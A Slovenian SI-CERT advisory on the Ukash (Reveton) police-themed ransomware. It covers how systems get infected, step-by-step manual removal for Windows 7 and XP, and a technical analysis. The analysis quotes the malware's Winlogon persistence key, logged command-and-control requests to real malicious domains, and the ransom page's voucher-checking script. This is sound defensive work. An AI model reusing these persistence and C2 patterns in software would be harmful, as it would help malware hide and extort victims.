Opis
Virus Ukash (tudi Reveton, Urausy) od uporabnika zahteva plačilo globe pod pretvezo nelegalnega prenosa avtorsko zaščitenih vsebin. Uporabniku ob zagonu prikaže lažno sporočilo slovenske Policije, kjer se zahteva plačilo globe kot nadomestilo za storjene prekrške. V zadnjem času opažamo porast izsiljevanja na podoben način kot v primeru okužbe, le da se v tem primeru lažno obvestilo policije odpre tekom brskanja po spletnih straneh, ponavadi v povečanem oknu spletnega brskalnika čez cel zaslon. V tem primeru ne gre za okužbo, uporabniki morajo zgolj zapreti spletni brskalnik (ali zgolj zavihek) in ob naslednjem zagonu brskalnika ne smejo obnoviti seje brskalnika.
Analiza okužbe
Uporabnikov sistem se okuži s pregledovanjem spletnih strani, na katerih se nahaja podtaknjena koda (gre za t.i. napad v mimohodu, ang. Drive-By-Download). Slednja poskuša izkoristiti morebitne varnostne luknje v brskalniku za namestitev škodljive kode. V primeru uspešne okužbe se na okuženem sistemu ob zagonu prikaže opozorilno obvestilo. Hkrati proces tudi blokira druga dejanja, ki bi se izognila prikazu obvestila. Več primerov lažnih obvestil slovenske policije, ki jih prikažejo različne variante virusa, lahko najdete na spletni strani https://www.botnets.fr/index.php/Landings_SI.
V večini primerov, ki smo jih preučili na SI-CERTu, je do okužbe prišlo zaradi izkoriščanja ranljivosti v starih verzijah programskega paketa Java. Uporabnikom priporočamo, da namestijo zadnjo verzijo Jave in jo redno posodabljajo. Če Jave ne potrebujejo pa naj jo odstranijo preko Nadzorne plošče.
Odstranitev okužbe
Okužba onemogoča uporabo sistema oz. zaganjanje programov, odstrani pa se jo lahko na spodaj navedene načine. Obstaja več verzij virusa Ukash, na SI-CERT smo seznanjeni s šestimi različicami, ki so se dosedaj širile med slovenskimi uporabniki.
Odstranjevanje s pomočjo Microsoft Windows Defender Offline
Okužbo lahko odstranite z izdelavo zagonskega CD ali USB ključa, ki ga naredite s pomočjo programa Microsoft Windows Defender Offline. Na čistem računalniku si prenesite program iz Microsoftove spletne strani
Program na čistem računalniku zaženite in sledite navodilom. Ustvaril vam bo poseben zagonski CD ali USB ključ, ki ga vstavite v okužen računalnik in iz njega zaženite računalnik. Kako računalnik zaženete iz zagonskega CDja ali USBja je odvisno od modela računalnika, zato preučite navodila vašega računalnika. Če navodil nimate, si poskušajte pomagati z navodili na spletni strani
Ko se računalnik zažene iz zagonskega CDja, se na zaslonu pojavi obvestilo:
Press any key to boot from CD or DVD...
Pritisnite katerokoli tipko in računalnik se bo zagnal v posebnem okolju, v katerem bo antivirusni program preskeniral celoten disk in poskusil odstraniti okužbo. Ko vam ponudi možnosti skeniranja izberite popoln pregled računalnika. Tako pregledovanje lahko traja tudi več ur.
Ročno odstranjevanje
Ročno odstranjevanje je lahko hitrejše in pri njem ni potreben dostop do drugega računalnika z nameščenim Windows operacijskim sistemom. Za ročno odstranjevanje sledite spodnjim korakom.
Windows 7
1. Ponovno zaženite računalnik. Ob zagonu Windows sistema, tik preden se prikaže Windows logotip, pritisnite tipko “F8”. Če se vam prikaže Windows logotip ste prepozno pritisnili tipko F8, v tem primeru računalnik ugasnite in ponovno poskusite.
2. V meniju izberite “Safe Mode With Command Prompt” (Varni način z ukazno vrstico) in pritisnite Enter
3. Če se vam prikaže prijavno okno, se prijavite v sistem, nato pa počakajte, da se na zaslonu prikaže ukazna vrstica.
4a. V ukazno vrstico enega za drugim vpišite naslednje ukaze (za vsakim ukazom pritisnite tipko Enter):
cd %appdata% dir /o:d /a
Zadnji ukaz vam prikaže seznam datotek, urejeno po času nastanka. Na desni strani v seznamu preverite, ali se na koncu nahaja datoteka z enim od spodnjih imen:
other.res data.dat cache.dat AltShell.dat skype.dat msconfig.dat
Če da, jo izbrišite z ukazom »del« (delete). Npr. če najdete datoteko data.dat, jo izbrišete z ukazom:
del data.dat
in pojdite na tč. 5.
4b. Če v seznamu datotek ne najdete nobene od navedenih datotek, vpišite naslednje ukaze:
cd %appdata% cd Microsoft cd Windows cd "Start Menu" cd Programs cd Startup dir /o:d /a
Zadnji ukaz vam zopet prikaže seznam datotek, urejeno po času nastanka. V seznamu preverite, ali se na koncu nahaja datoteka ctfmon.lnk ali datoteka z dolgim imenom in podaljškom .lnk. Če da, jo izbrišite z ukazom »del«, npr.:
del ctfmon.lnk
V primeru, da ne najdete nobene od teh navedenih datotek, imate računalnik zelo verjetno okužen z novo varianto virusa. V tem primeru poskusite računalnik očistiti s pomočjo programa Microsoft Windows Defender Offline ali pa nas kontaktirajte da vam pošljemo nadaljnja navodila.
5. Ponovno zaženite računalnik, tako da vpišete spodnji ukaz in pritisnete Enter:
shutdown –r –t 0
6. Sistem preglejte s posodobljenim antivirusnim programom.
Če vam bo po zgornjih navodilih uspelo očistiti računalnik bomo zelo veseli, če nas o tem obvestite tako da nam pošljete el. sporočilo na cert@cert.si.
Windows XP
1. Ponovno zaženite računalnik. Ob zagonu Windows sistema, tik preden se prikaže Windows logotip, pritisnite tipko “F8”. Če se vam prikaže Windows logotip ste prepozno pritisnili tipko F8, v tem primeru računalnik ugasnite in ponovno poskusite.
2. V meniju izberite “Safe Mode With Command Prompt” (Varni način z ukazno vrstico) in pritisnite Enter.
3. Če se vam prikaže prijavno okno, se prijavite v sistem, nato pa počakajte, da se na zaslonu prikaže ukazna vrstica.
4a. V ukazno vrstico enega za drugim vpišite naslednje ukaze (za vsakim ukazom pritisnite tipko Enter):
cd %appdata% dir /o:d /a
Zadnji ukaz vam prikaže seznam datotek, urejeno po času nastanka. Na desni strani v seznamu preverite, ali se na koncu nahaja datoteka z enim od spodnjih imen:
other.res data.dat cache.dat AltShell.dat skype.dat msconfig.dat
Če da, jo izbrišite z ukazom »del« (delete). Npr. če najdete datoteko cache.dat, jo izbrišete z ukazom:
del cache.dat
in pojdite na tč.5.
4b. Če v seznamu datotek ne najdete nobene od navedenih datotek, vpišite naslednje ukaze:
cd %userprofile% cd "Start Menu" cd Programs cd Startup dir /o:d /a
Zadnji ukaz vam zopet prikaže seznam datotek, urejeno po času nastanka. V seznamu preverite, ali se na koncu nahaja datoteka ctfmon.lnk ali datoteka z dolgim imenom in podaljškom .lnk. Če da, jo izbrišite z ukazom »del«, npr.:
del ctfmon.lnk
V primeru, da ne najdete nobene od teh navedenih datotek, imate računalnik zelo verjetno okužen z novo varianto virusa. V tem primeru poskusite računalnik očistiti s pomočjo programa Microsoft Windows Defender Offline ali pa nas kontaktirajte da vam pošljemo nadaljnja navodila.
5. Ponovno zaženite računalnik, tako da vpišete spodnji ukaz in pritisnete Enter:
shutdown –r –t 0
6. Sistem preglejte s posodobljenim antivirusnim programom.
Če vam bo po zgornjih navodilih uspelo očistiti računalnik bomo zelo veseli, če nas o tem obvestite tako da nam pošljete el. sporočilo na cert@cert.si.
Windows 8/8.1
Sistemi Windows 8 in 8.1 imajo spremenjen postopek zagona v varni način. V večini primerov se tega ne da opraviti s pritiskom na tipko F8 med zagonom (1). V tem primeru zato uporabnikom svetujemo odstranitev okužbe, kot je opisano v razdelku “Odstranjevanje s pomočjo Microsoft Windows Defender Offline”.
Tehnična analiza okužbe (1. varianta)
Po zagonu zlonamerni program injecira kodo v proces svchost.exe:
12:03:41,2713843,"ttvke9443gcw8q7l.exe","1124","Process Create", "C:\WINDOWS\explorer.exe","SUCCESS","PID: 2012, Command line: ""C:\WINDOWS\explorer.exe""" 12:03:42,5062334,"Explorer.EXE","1848","Process Create", "C:\WINDOWS\system32\svchost.exe","SUCCESS","PID: 148, Command line: ""C:\WINDOWS\system32\svchost.exe"""
Nato se skopira v datoteko %userprofile%\Application Data\msconfig.dat (Windows XP) oz. %userprofile%\Appdata\Roaming\msconfig.dat (Windows 7), ter ustvari zagonski ključ v registru:
12:03:43,5709439,"svchost.exe","148","RegSetValue", "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\shell", "SUCCESS","Type: REG_SZ, Length: 144, Data: explorer.exe,C:\Documents and Settings\user\Application Data\msconfig.dat"
Poveže se na enega od spletnih strežnikov na domeni tdzzf.ru oz. cxcyp.su, od koder v zakodirani obliki prejme kodo spletne strani, kjer se nahaja besedilo, ki ga prikaže uporabniku:
GET /555657550A896FA373AC286F5D17EF074B954434DD0E32AC1C1B HTTP/1.1 User-Agent: Our_Agent Host: tdzzf.ru Cache-Control: no-cache HTTP/1.1 200 OK Server: nginx/0.7.67 Date: Mon, 08 Oct 2012 14:14:46 GMT Content-Type: application/octet-stream Connection: keep-alive X-Powered-By: PHP/5.2.6-1+lenny16 Cache-Control: public Content-Disposition: attachment; filename=44456 Content-Transfer-Encoding: binary Content-Length: 79618
Koda spletne strani je različna glede na lokacijo IP naslova okuženega računalnika. Npr. če je okužen sistem s slovenskim IP naslovom, spletni strežnik pošlje obvestilo slovenske policije, v primeru okužbe sistema z IP naslovom v ZDA pa spletni strežnik pošlje obvestilo FBI. Spletni strežnik verjetno pošilja lokalna sporočila tudi v primeru okužb računalnikov v drugih evropskih državah.
Spletna stran vsebuje javascript kodo, ki preverja pravilno sintakso vpisane ukash oz. paysafecard kode:
if(!(text.length != 0 && /^633718[0-9]{13}$/.test(text) && cval > 0) && type == 0){ fdialog('showerror', 'block', 0); return; } if(!(text.length != 0 && /^0[0-9]{15}$/.test(text) && cval > 0) && type == 1){ fdialog('showerror', 'block', 0); return; }
Če je koda sintaktično pravilna, jo v zakriptani obliki sporoči na omenjena spletna strežnika s HTTP GET zahtevkom, npr.:
GET /555657550A896EC413A0E86F5D17EF074B9BG834E18970A1C1A3728CA184524B95C138CDB4E366ECADC7D078E2235213F08 HTTP/1.1User-Agent: Our_Agent Host: tdzzf.ru Cache-Control: no-cache
Zaščita
Uporabnikom svetujemo, da v namen zaščite sistema redno nameščajo zadnje popravke operacijskega sistema, izbranega brskalnika, ter njegovih vtičnikov, predvsem programskega paketa Java. Hkrati naj se izogibajo izvajanju programske opreme neznanega izvora, saj lahko tudi slednja vsebuje škodljivo programsko opremo. Priporočamo tudi redno izvajanje varnostnih kopij sistema.
(1)
http://windows.microsoft.com/sl-si/windows-8/windows-startup-settings-including-safe-mode
http://www.7tutorials.com/5-ways-boot-safe-mode-windows-8-windows-81
Zadnja posodobitev: 3.3.2014